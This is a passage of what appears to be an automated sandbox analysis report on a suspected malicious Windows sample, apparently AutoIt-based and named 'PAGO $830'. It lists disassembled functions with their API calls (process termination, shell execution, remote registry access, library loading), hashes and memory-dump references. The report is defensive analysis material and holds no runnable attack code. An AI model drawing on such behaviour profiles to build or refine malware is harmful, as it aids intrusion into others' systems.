                                                          Function 00DD5153 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDC.USER32(00000000), ref: 00DD516E
                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00DD517F
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DD5186
                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00DD518E
                                                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00DD51A5
                                                          • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00DD51B7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CapsDevice$Release
                                                          • String ID:
                                                          • API String ID: 1035833867-0
                                                          • Opcode ID: 8c8eadc430e5b5939775c1f5f657a00c579103e4295a97b5ebbbd297011d815b
                                                          • Instruction ID: c92e2c6c60b59251451f9d630b64f987aa14eceb6d815acc3f9420adeeb76b18
                                                          • Opcode Fuzzy Hash: 8c8eadc430e5b5939775c1f5f657a00c579103e4295a97b5ebbbd297011d815b
                                                          • Instruction Fuzzy Hash: 62018FB5A40309BFEF109BB6AC49F5EBFB8EB48751F144066FA04A7281D6719C04CBA0
                                                          Function 00D734CE Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D734FF
                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 00D73507
                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D73512
                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D7351D
                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 00D73525
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D7352D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Virtual
                                                          • String ID:
                                                          • API String ID: 4278518827-0
                                                          • Opcode ID: fb948e3bd4dc8f7882a06467569511019070196d3e4cbbad260537aa08c0e2b8
                                                          • Instruction ID: 186161fa0bf59cbeb20d03ec47713659ff6616aa66dd90ab51f131fefe9f299a
                                                          • Opcode Fuzzy Hash: fb948e3bd4dc8f7882a06467569511019070196d3e4cbbad260537aa08c0e2b8
                                                          • Instruction Fuzzy Hash: 59016CB09027597DE3008F5A8C85B52FFA8FF19754F00411B915C47941C7F5A864CBE5
                                                          Function 00DDEA3E Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00DDEA4E
                                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00DDEA64
                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 00DDEA73
                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DDEA82
                                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DDEA8C
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DDEA93
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                          • String ID:
                                                          • API String ID: 839392675-0
                                                          • Opcode ID: 9d33bc537327cc83fbb648707ca3a3c5b154b07fdc4233d6b06b98af64584fa1
                                                          • Instruction ID: 27de6c2a4b45bbcf84b96c82e7a695bb08f4e8e837fa132085a35af3805ebd4c
                                                          • Opcode Fuzzy Hash: 9d33bc537327cc83fbb648707ca3a3c5b154b07fdc4233d6b06b98af64584fa1
                                                          • Instruction Fuzzy Hash: 05F06D72101119BFE7201753AC0EEAB3A7CEBC6F11F104258F601E1090D6A21A4586B5
                                                          Function 00DD17B8 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00DD17C3
                                                          • UnloadUserProfile.USERENV(?,?), ref: 00DD17CF
                                                          • CloseHandle.KERNEL32(?), ref: 00DD17D8
                                                          • CloseHandle.KERNEL32(?), ref: 00DD17E0
                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00DD17E9
                                                          • HeapFree.KERNEL32(00000000), ref: 00DD17F0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                          • String ID:
                                                          • API String ID: 146765662-0
                                                          • Opcode ID: 4d74473f25c741ef594a03df5092e970287469daea066ab8e8adeffd6d417b92
                                                          • Instruction ID: 939c2420b670f7145e9bce8417c36612156e2776e790794925175aef2253e055
                                                          • Opcode Fuzzy Hash: 4d74473f25c741ef594a03df5092e970287469daea066ab8e8adeffd6d417b92
                                                          • Instruction Fuzzy Hash: D9E0E536004106BFDB011FA2EC0C90ABF39FF49B22B208321F225A10B1CB3394A4DF90
                                                          Function 00D7D4E0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __Init_thread_footer.LIBCMT ref: 00D7D7B3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Init_thread_footer
                                                          • String ID: D%$D%$D%$D%
                                                          • API String ID: 1385522511-2722557190
                                                          • Opcode ID: 91efce27ce2d3b6355593e56c626c14b91d8126464bc300c92eec8ea1b7b9b77
                                                          • Instruction ID: 9edf095a0bfd32160c1972f1ca4ab58be16b6b8488fb0f18dbc847f1e5c9ab31
                                                          • Opcode Fuzzy Hash: 91efce27ce2d3b6355593e56c626c14b91d8126464bc300c92eec8ea1b7b9b77
                                                          • Instruction Fuzzy Hash: FA915D75A00206CFCB18CF59C0916ADB7F2FF59314B64855ED98AA7350E731E981CFA0
                                                          Function 00DDC4EE Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00D78FA0: _wcslen.LIBCMT ref: 00D78FA5
                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00DDC60C
                                                          • _wcslen.LIBCMT ref: 00DDC653
                                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00DDC6BA
                                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00DDC6E8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$Info_wcslen$Default
                                                          • String ID: 0
                                                          • API String ID: 1227352736-4108050209
                                                          • Opcode ID: ef5bcd54d88878456f13dbd4a742f7177bab2b82f07474b92dda37533c3a9ba4
                                                          • Instruction ID: 3cbc1998f7fee6908c9accf89e61a8fd5cb74d7b2c7fcb02296827581423173e
                                                          • Opcode Fuzzy Hash: ef5bcd54d88878456f13dbd4a742f7177bab2b82f07474b92dda37533c3a9ba4
                                                          • Instruction Fuzzy Hash: 2B51F4716243029BDB149F28C845B6B77E4EF89314F082A2EF995E32E1DB70D944CB72
                                                          Function 00DFAC8B Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ShellExecuteExW.SHELL32(0000003C), ref: 00DFADCA
                                                            • Part of subcall function 00D78FA0: _wcslen.LIBCMT ref: 00D78FA5
                                                          • GetProcessId.KERNEL32(00000000), ref: 00DFAE5F
                                                          • CloseHandle.KERNEL32(00000000), ref: 00DFAE8E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CloseExecuteHandleProcessShell_wcslen
                                                          • String ID: <$@
                                                          • API String ID: 146682121-1426351568
                                                          • Opcode ID: e5c4d200e77f515fe512a81ed56ee53f9f0f180bd5fed27c22f1bf2769a712c1
                                                          • Instruction ID: 96d3d83c1acbd8283aeaa45eca9976fd72ba51b79520f4a63e84f5b20bb74c51
                                                          • Opcode Fuzzy Hash: e5c4d200e77f515fe512a81ed56ee53f9f0f180bd5fed27c22f1bf2769a712c1
                                                          • Instruction Fuzzy Hash: D8714575A00219DFCB14DFA8C484AAEBBF0FF08314F05C499E959AB252DB75AD44CBB1
                                                          Function 00DD70F4 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00DD715C
                                                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00DD7192
                                                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00DD71A3
                                                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00DD7225
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                                          • String ID: DllGetClassObject
                                                          • API String ID: 753597075-1075368562
                                                          • Opcode ID: 40a043be5a64c8ef31dbbb6afda99f638d3dc97d8af9d98ad0a1ab96a3849890
                                                          • Instruction ID: 2fb14beba6b5ba82224c9f8a18a87fe4f6c9633610ab2f57d17be890148297d6
                                                          • Opcode Fuzzy Hash: 40a043be5a64c8ef31dbbb6afda99f638d3dc97d8af9d98ad0a1ab96a3849890
                                                          • Instruction Fuzzy Hash: 544169B1605244EFDF15CF64C884A9A7BB9EF44310B1491EEBD05AF206E7B1D944CBB0
                                                          Function 00E02E4A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00E02EC0
                                                          • LoadLibraryW.KERNEL32(?), ref: 00E02EC7
                                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00E02EDC
                                                          • DestroyWindow.USER32(?), ref: 00E02EE4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$DestroyLibraryLoadWindow
                                                          • String ID: SysAnimate32
                                                          • API String ID: 3529120543-1011021900
                                                          • Opcode ID: 2ba8ea205f3257c643fabd890367ee33fad5784e16da615d5fed1467b7ac9973
                                                          • Instruction ID: a54b1f891269f26350ec190561e03a12a335c2adad9498db5f3d3727ae74c2f7
                                                          • Opcode Fuzzy Hash: 2ba8ea205f3257c643fabd890367ee33fad5784e16da615d5fed1467b7ac9973
                                                          • Instruction Fuzzy Hash: E7217C71250205AFEF118F64DC48EAB37E9EB59768F20622CFA50B61D0D6318C829760
                                                          Function 00D94CFD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00D94CAE,00000003,?,00D94C4E,00000003,00E388C8,0000000C,00D94DA5,00000003,00000002), ref: 00D94D1D
                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D94D30
                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,00D94CAE,00000003,?,00D94C4E,00000003,00E388C8,0000000C,00D94DA5,00000003,00000002,00000000), ref: 00D94D53
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 4dbc46d1ab22caa336da186c29bd01caabfd683743ac13eef75acc9431091978
                                                          • Instruction ID: df57c05157ab7036d9a72a1341219cabe38da8ea9e901172283d4e892d5faf31
                                                          • Opcode Fuzzy Hash: 4dbc46d1ab22caa336da186c29bd01caabfd683743ac13eef75acc9431091978
                                                          • Instruction Fuzzy Hash: 88F0AF34A00208BFDB149F92DC09BADBFB4EF44751F1441A4F809B21A1DB719985CAA1
                                                          Function 00D76832 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D7687F,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D7683E
                                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00D76850
                                                          • FreeLibrary.KERNEL32(00000000,?,?,00D7687F,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D76862
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Library$AddressFreeLoadProc
                                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                          • API String ID: 145871493-3689287502
                                                          • Opcode ID: 732393b19a5290d79ba03641ccace9634d48fcf13a0ab2d91d8a778a42796a1e
                                                          • Instruction ID: 36bef9bbb17fc9037ea24f3ba331e67b0be75ecc31dc0cd1b1fddd1afe442909
                                                          • Opcode Fuzzy Hash: 732393b19a5290d79ba03641ccace9634d48fcf13a0ab2d91d8a778a42796a1e
                                                          • Instruction Fuzzy Hash: CEE08632602B215BD21117266C08B5A6664DF82B13B194125F908F2181FB64CD4581B2
                                                          Function 00D767FB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00DB488B,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D76804
                                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00D76816
                                                          • FreeLibrary.KERNEL32(00000000,?,?,00DB488B,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D76829
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Library$AddressFreeLoadProc
                                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                          • API String ID: 145871493-1355242751
                                                          • Opcode ID: cbc62f5f40918f3a5e90379d3acc40904c8cf9283a1bc2b038bda28017d7c4d5
                                                          • Instruction ID: 19c7364274ae61d68066da4c162d515cdc4c6bd6654e5c402a2750639a947948
                                                          • Opcode Fuzzy Hash: cbc62f5f40918f3a5e90379d3acc40904c8cf9283a1bc2b038bda28017d7c4d5
                                                          • Instruction Fuzzy Hash: CBD01232543A216FD2221B26AC1898E7E24DF8AB2131D4125B809B2194FF26CD49C6F2
                                                          Function 00DFA2AE Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentProcessId.KERNEL32 ref: 00DFA34E
                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00DFA35C
                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00DFA38F
                                                          • CloseHandle.KERNEL32(?), ref: 00DFA564
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Process$CloseCountersCurrentHandleOpen
                                                          • String ID:
                                                          • API String ID: 3488606520-0
                                                          • Opcode ID: 1c31cfbadd0a52e61010fbbfa1f672a9e54d839091676b892e89c6cc31e46fc0
                                                          • Instruction ID: 576479826048637cde3b11a4ae8789de01236e038cec72521267a1387d6b06a7
                                                          • Opcode Fuzzy Hash: 1c31cfbadd0a52e61010fbbfa1f672a9e54d839091676b892e89c6cc31e46fc0
                                                          • Instruction Fuzzy Hash: CBA19EB16043019FD720DF28C886B2AB7E5EF88714F14C85CF5999B392D7B1ED458BA2
                                                          Function 00DDE319 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00DDDCFE: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00DDCE40,?), ref: 00DDDD1B
                                                            • Part of subcall function 00DDDCFE: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00DDCE40,?), ref: 00DDDD34
                                                            • Part of subcall function 00DDE0B7: GetFileAttributesW.KERNEL32(?,00DDCEB3), ref: 00DDE0B8
                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00DDE391
                                                          • MoveFileW.KERNEL32(?,?), ref: 00DDE3CA
                                                          • _wcslen.LIBCMT ref: 00DDE509
                                                          • _wcslen.LIBCMT ref: 00DDE521
                                                          • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00DDE56E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                          • String ID:
                                                          • API String ID: 3183298772-0
                                                          • Opcode ID: 43d56a09dcd65872986cbbb35451a4ae84c38239a6055af4cdc20d1c84d89e40
                                                          • Instruction ID: 5f743f2c264f262d2057f0066fbbe30f44625f0564aa60eb81d47a345a59816c
                                                          • Opcode Fuzzy Hash: 43d56a09dcd65872986cbbb35451a4ae84c38239a6055af4cdc20d1c84d89e40
                                                          • Instruction Fuzzy Hash: 08518EB20083849BC724EB94D8819DBB3ECEF84310F44492FF689D7151EF71A6888776
                                                          Function 00DFB8F0 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00D7B606: _wcslen.LIBCMT ref: 00D7B610
                                                            • Part of subcall function 00DFC8BF: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DFB5D5,?,?), ref: 00DFC8DC
                                                            • Part of subcall function 00DFC8BF: _wcslen.LIBCMT ref: 00DFC918
                                                            • Part of subcall function 00DFC8BF: _wcslen.LIBCMT ref: 00DFC98F
                                                            • Part of subcall function 00DFC8BF: _wcslen.LIBCMT ref: 00DFC9C5
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DFB9CC
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DFBA27
                                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00DFBA8A
                                                          • RegCloseKey.ADVAPI32(?,?), ref: 00DFBACD
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00DFBADA
                                                          Memory Dump Source
